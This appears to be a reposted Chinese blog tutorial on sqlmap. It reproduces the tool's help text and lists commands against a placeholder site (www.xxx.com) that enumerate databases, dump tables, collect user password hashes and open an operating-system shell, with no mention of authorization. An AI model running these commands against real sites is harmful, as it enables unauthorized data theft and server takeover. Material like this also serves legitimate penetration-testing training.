sqlmap 使用测试初级教程(实际已测试 -版本1.0)
来源:互联网 发布:eclipse中文是乱码 mac 编辑:程序博客网 时间:2024/06/07 05:17
Usage: python sqlmap.py [options]Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1)Target: At least one of these options has to be provided to set the target(s) -d DIRECT Direct connection to the database -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1") -l LOGFILE Parse targets from Burp or WebScarab proxy logs -m BULKFILE Scan multiple targets enlisted in a given textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI fileRequest: These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST --param-del=PDEL Character used for splitting parameter values --cookie=COOKIE HTTP Cookie header --cookie-del=CDEL Character used for splitting cookie values --load-cookies=L.. File containing cookies in Netscape/wget format --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header --random-agent Use randomly selected HTTP User-Agent header --host=HOST HTTP Host header --referer=REFERER HTTP Referer header --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123") --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM) --auth-cred=ACRED HTTP authentication credentials (name:password) --auth-private=A.. HTTP authentication PEM private key file --proxy=PROXY Use a HTTP proxy to connect to the target URL --proxy-cred=PCRED HTTP proxy authentication credentials (name:password) --ignore-proxy Ignore system default HTTP proxy --tor Use Tor anonymity network --tor-port=TORPORT Set Tor proxy port other than default --tor-type=TORTYPE Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5) --check-tor Check to see if Tor is used properly --delay=DELAY Delay in seconds between each HTTP request --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) --retries=RETRIES Retries when the connection timeouts (default 3) --randomize=RPARAM Randomly change value for given parameter(s) --safe-url=SAFURL URL address to visit frequently during testing --safe-freq=SAFREQ Test requests between two visits to a given safe URL --skip-urlencode Skip URL encoding of payload data --force-ssl Force usage of SSL/HTTPS --hpp Use HTTP parameter pollution --eval=EVALCODE Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")Optimization: These options can be used to optimize the performance of sqlmap -o Turn on all optimization switches --predict-output Predict common queries output --keep-alive Use persistent HTTP(s) connections --null-connection Retrieve page length without actual HTTP response body --threads=THREADS Max number of concurrent HTTP(s) requests (default 1)Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --skip=SKIP Skip testing for given parameter(s) --dbms=DBMS Force back-end DBMS to this value --dbms-cred=DBMS.. DBMS authentication credentials (user:password) --os=OS Force back-end DBMS operating system to this value --invalid-bignum Use big numbers for invalidating values --invalid-logical Use logical operations for invalidating values --no-cast Turn off payload casting mechanism --no-escape Turn off string escaping mechanism --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection dataDetection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (0-3, default 1) --string=STRING String to match when query is evaluated to True --not-string=NOT.. String to match when query is evaluated to False --regexp=REGEXP Regexp to match when query is evaluated to True --code=CODE HTTP code to match when query is evaluated to True --text-only Compare pages based only on the textual content --titles Compare pages based only on their titlesTechniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection --union-char=UCHAR Character to use for bruteforcing number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain=DNS.. Domain name used for DNS exfiltration attack --second-order=S.. Resulting page URL searched for second-order responseFingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprintEnumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges --roles Enumerate DBMS users roles --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries --search Search column(s), table(s) and/or database name(s) -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --first=FIRSTCHAR First query output word character to retrieve --last=LASTCHAR Last query output word character to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell --sql-file=SQLFILE Execute SQL statements from given file(s)Brute force: These options can be used to run brute force checks --common-tables Check existence of common tables --common-columns Check existence of common columnsUser-defined function injection: These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared libraryFile system access: These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write toOperating system access: These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an out-of-band shell, meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process' user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework is installed --tmp-path=TMPPATH Remote absolute path of temporary files directoryWindows registry access: These options can be used to access the back-end database management system Windows registry --reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value typeGeneral: These options can be used to set some general working parameters -s SESSIONFILE Load session from a stored (.sqlite) file -t TRAFFICFILE Log all HTTP traffic into a textual file --batch Never ask for user input, use the default behaviour --charset=CHARSET Force character encoding used for data retrieval --crawl=CRAWLDEPTH Crawl the website starting from the target URL --csv-del=CSVDEL Delimiting character used in CSV output (default ",") --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE) --eta Display for each output the estimated time of arrival --flush-session Flush session files for current target --forms Parse and test forms on target URL --fresh-queries Ignore query results stored in session file --hex Use DBMS hex function(s) for data retrieval --output-dir=ODIR Custom output directory path --parse-errors Parse and display DBMS error messages from responses --pivot-column=P.. Pivot column name --save Save options to a configuration INI file --scope=SCOPE Regexp to filter targets from provided proxy log --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW) --update Update sqlmapMiscellaneous: -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") --alert=ALERT Run shell command(s) when SQL injection is found --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N") --beep Make a beep sound when SQL injection is found --check-waf Heuristically check for WAF/IPS/IDS protection --cleanup Clean up the DBMS by sqlmap specific UDF and tables --dependencies Check for missing (non-core) sqlmap dependencies --disable-coloring Disable console output coloring --gpage=GOOGLEPAGE Use Google dork results from specified page number --identify-waf Make a through testing for a WAF/IPS/IDS protection --mobile Imitate smartphone through HTTP User-Agent header --page-rank Display page rank (PR) for Google dork results --purge-output Safely remove all content from output directory --smart Conduct through tests only if positive heuristic(s) --wizard Simple wizard interface for beginner users
sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --dbssqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --tables -D "DB"sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --columns -T "TABLE" -D "DB"sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --dump -C "NAME" -T"TABLE" -D "DB"sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --dump-all -T "TABLE" -D "DB"
sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --current-db sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --current-user sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --users sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --passwords sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" -D DB -T TABLE -C "ID1,ID2,ID3" --start 1 --stop 10 --dump sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --is-dba //isDBA ?sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --privileges //sqlmap.py -u "http://www.xxx.com/news_0.asp?id=4441" --os-shell //web shell
1 0
- sqlmap 使用测试初级教程(实际已测试 -版本1.0)
- sqlmap测试
- 搭建Mutillidae使用sqlmap注入测试
- [渗透测试]Sqlmap使用参数说明
- 使用sqlmap 绕过防火墙进行注入测试
- 使用sqlmap 绕过防火墙进行注入测试
- 使用sqlmap 绕过防火墙进行注入测试
- JMeter压力测试初级教程
- sqlmap渗透测试整理
- memcache 基本使用-已测试
- 使用Burpsuite辅助Sqlmap进行POST注入测试
- (转载)使用sqlmap 绕过防火墙进行注入测试
- 3G网络实际使用测试情况
- Sqlmap常用渗透测试语句
- 渗透测试工具sqlmap基础教程
- 渗透测试工具sqlmap基础教程
- 渗透测试工具sqlmap基础教程
- 渗透测试工具sqlmap基础教程
- 黑马程序员——Java基础——继承之内部类(四)
- opencv for android (环境搭建篇)
- 【小松教你手游开发】【面试必读(编程基础)】转载一篇优秀的c#泛型理解
- Android手机存储器分类
- MFC的图片控件的使用(图片适应控件大小并不失真)
- sqlmap 使用测试初级教程(实际已测试 -版本1.0)
- MySQL存储引擎
- 自定义卫星菜单CustomArcMenu
- css之菜单制作
- ViewPageIndecator使用
- Android notification的使用
- 系统从很老的V12.4.X升级到V15.0.4中个别报表构建中出现的错误及解决办法
- 【iOS】OC-时间转化的时区问题
- 修改Sql Server列属性时报错
